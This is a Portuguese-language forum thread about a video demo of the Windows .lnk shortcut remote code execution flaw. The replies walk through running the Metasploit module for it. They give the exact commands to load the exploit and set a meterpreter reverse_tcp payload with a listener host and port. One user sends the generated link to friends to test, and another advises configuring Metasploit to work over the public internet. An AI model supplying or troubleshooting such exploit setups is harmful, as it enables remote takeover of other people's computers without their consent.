Parabéns, muito bem feito e de fácil entendimento
[video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video Demo
Criei um vídeo demonstrando a vulnerabilidade exposta no post anterior "Vulnerabilidade no sistema de arquivos de atalhos .lnk" que afeta versões como Windows 7, Vista, XP, 2003 e 2008, utilizei o recente exploit disponibilizado no Metasploit carga "ms10_xxx_windows_shell_lnk_execute.rb" e consegui obter acesso ao computador de teste, não precisa executar o arquivo .lnk, a visualização, interação ja faz com que o atacante consiga controle total da vítima.
Para maiores informações sobre a vulnerabilidade acessem:
Microsoft Security Advisory (2286198): Vulnerability in Windows Shell Could Allow Remote Code Execution
Computer Security Research - McAfee Labs Blog
obs: Não repare a edição é meu primeiro vídeo! =o)
Link Video: YouTube - Vulnerability in Windows Shell Could Allow Remote Code Execution!
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De
Parabéns, muito bem feito e de fácil entendimento
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution
Sera que alguem poderia me mostrar o caminho que ele usa na vídeo aula?
eu entendi por isso: use exploit/windows/browser ms10_xxx_windows_shell_lnk_execute.rb
Mas está dando erro
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De
Quando você não souber a localização de algum exploit/auxiliary/nops/etc..., use o comando "search".
Ok?Code:msf > search ms10_xxx[*] Searching loaded modules for pattern 'ms10_xxx'... Exploits ======== Name Rank Description ---- ---- --------- windows/browser/ms10_xxx_windows_shell_lnk_execute excellent Microsoft Windows Shell LNK Code Execution msf >
Att,
(gdb) disass m(y_br)ain
®
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De
Reparando o video agora, não é necessário digitar o que vem após o URIPATH /.
Digitando apenas o IP do Backtrack já se ganha a shell.
Att,
(gdb) disass m(y_br)ain
®
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De
espreto
Obrigado pela esplicação
Tudo certo
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De
Ae galera blz sou novo aqui primeiro post rs..
Chequei essa falha aqui a uns dias.. no Backtrack 4 r2
o exploit para o lnk que vem com a distro em si é esse deve ser uma atualização?
Code:msf > search lnk[*] Searching loaded modules for pattern ´lnk´... windows/browser/ms10_046_shortcut_icon_dllloarderapos isso gerou o link e a escuta na 4444 mas nao foi...Code:use windows/browser/ms10_046_shortcut_icon_dllloarder set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.0.2.15 set LPORT 4444
rodei o meta no blacktrack pelo virtualbox.
abrass
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De
Pela natureza do sploit, pude perceber que você configurou errado o metasploit.Originally Posted by pinha
para saber como configurar corretamente "show options"
[]'
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De
entao Bhior por esse deve estar mesmo.. agora axei o exploit mensionado no inicio pelo packetstorm baixei pelo virualbox e add aos modulos/browser
rodei...
gerou normal o link do clientCode:use windows/browser/ms10_xxx_windows_shell_lnk_execute set payload windows/meterpreter/reverse_tcp set LHOST 10.0.2.15 set LPORT 4444 exploit
\\10.0.2.15\sRaVXmUk\
enviei pra alguns amigos para testar mas nada de abrir a sessao...
Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De
Uma coisa e você usar um metasploit em rede privada e outra em rede publica, requer uma configuração para que você possa usar o metasploit na internet.
OU
Seus amigos compartilham a mesma rede local que a sua?
É importante observar se os respectivos sistema estão com essa vulnerabilidade.
[]'
Posting Permissions
